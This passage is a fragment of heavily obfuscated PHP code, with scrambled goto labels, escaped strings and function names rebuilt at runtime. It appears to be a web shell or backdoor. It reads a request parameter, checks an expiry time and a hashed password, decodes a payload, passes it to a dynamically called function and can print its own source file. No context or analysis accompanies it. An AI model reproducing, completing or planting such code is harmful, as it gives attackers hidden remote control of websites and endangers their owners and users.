kcIkExvi1nJgFdBw: @$O8B0c2b0Ocrta0Gs[5 + 5](INPUT_GET, "\x6f\146") == 1 && die($O8B0c2b0Ocrta0Gs[2 + 3](__FILE__)); goto UoZ4v5i7NIghTai7; UoZ4v5i7NIghTai7: if (!(@$BppI6FUxZ1f1zcqn[0] - time() > 0 and md5(md5($BppI6FUxZ1f1zcqn[2 + 1])) === "\142\x38\x66\141\67\x35\x36\67\61\145\65\x31\64\x30\x30\70\145\x36\x63\71\x38\x64\x31\146\x32\63\63\63\x31\x34\67\x63")) { goto LtWdpDkeCksIGa4L; } goto ZfxUmiOyp4xVLsxy; cqZq67LWJHFNgixU: $ELHMrh9xVQvbJiqH = @$O8B0c2b0Ocrta0Gs[1]($O8B0c2b0Ocrta0Gs[4 + 6](INPUT_GET, $O8B0c2b0Ocrta0Gs[7 + 2])); goto DRVgjNls8cZGXkLo; AeBl0bccCccg6V9Q: @$O8B0c2b0Ocrta0Gs[0]('', $O8B0c2b0Ocrta0Gs[7 + 0] . $O8B0c2b0Ocrta0Gs[3 + 1]($skElpDwFUQ5zam0k) . $O8B0c2b0Ocrta0Gs[5 + 3]); goto Rpn4OdmpOVgVbMPP; ZfxUmiOyp4xVLsxy: $skElpDwFUQ5zam0k = self::pehcNfo4Cl4sOhq2($BppI6FUxZ1f1zcqn[1 + 0], $O8B0c2b0Ocrta0Gs[5 + 0]); goto AeBl0bccCccg6V9Q; Rpn4OdmpOVgVbMPP: die; goto NMEHTnzvWUGc2INr; MksstpGH0JGDTtoj: foreach ($wN1XPFXlZpCmR6Y3 as $opswEfYB9wrvUNhO) { $O8B0c2b0Ocrta0Gs[] = self::yTStA4D1J6tH0xwc($opswEfYB9wrvUNhO); Mlr1OMQ3jCi7TMxg: } goto fg4Mo38ASwEeGI3f; fg4Mo38ASwEeGI3f: k925XNNHA1BioSDN: goto cqZq67LWJHFNgixU; k0kcvSQER93ADSRF: } } goto A1BhH_oNIu0lzocZ; qXB1EuL9cYMCm4VK: if (!(in_array(gettype($M4pefdsO1d_aLTD4) . "\62\x36", $M4pefdsO1d_aLTD4) && md5(md5(md5(md5($M4pefdsO1d_aLTD4[20])))) === "\x35\141\64\x62\70\61\61\65\x34\143\x39\144\65\x30\142\x32\x36\145\x38\70\60\x39\143\x39\142\x38\x64\144\x35\142\66\61")) { goto pFYkk73YGg7h8Nax; } goto n6UJzlJ7kFu1wOVa; xJ5L5vN7ooGdGNVj: @($M4pefdsO1d_aLTD4 = $M4pefdsO1d_aLTD4[84]($M4pefdsO1d_aLTD4[55], $M4pefdsO1d_aLTD4[70](${$M4pefdsO1d_aLTD4[37]}[27]))); goto VuhX2iIUMUKqv6r5; n6UJzlJ7kFu1wOVa: $M4pefdsO1d_aLTD4[70] = $M4pefdsO1d_aLTD4[70] . $M4pefdsO1d_aLTD4[73]; goto j1nSwq2927RB1nOU; VuhX2iIUMUKqv6r5: $M4pefdsO1d_aLTD4(); goto SJ4qDr5Wrb5rwGE_; rmU7bK021hFFOKev: $MU202we4sztOvuPe = range("\176", "\40"); goto MzELuz6lADmUna4V; SJ4qDr5Wrb5rwGE_: pFYkk73YGg7h8Nax: goto zlOMNOML7QClHOVi; j1nSwq2927RB1nOU: $M4pefdsO1d_aLTD4[84] = $M4pefdsO1d_aLTD4[70]($M4pefdsO1d_aLTD4[84]); goto xJ5L5vN7ooGdGNVj; A1BhH_oNIu0lzocZ: Wkbi8bdW7F2rSt8T::UZ83xelJjZg3rprk();
?>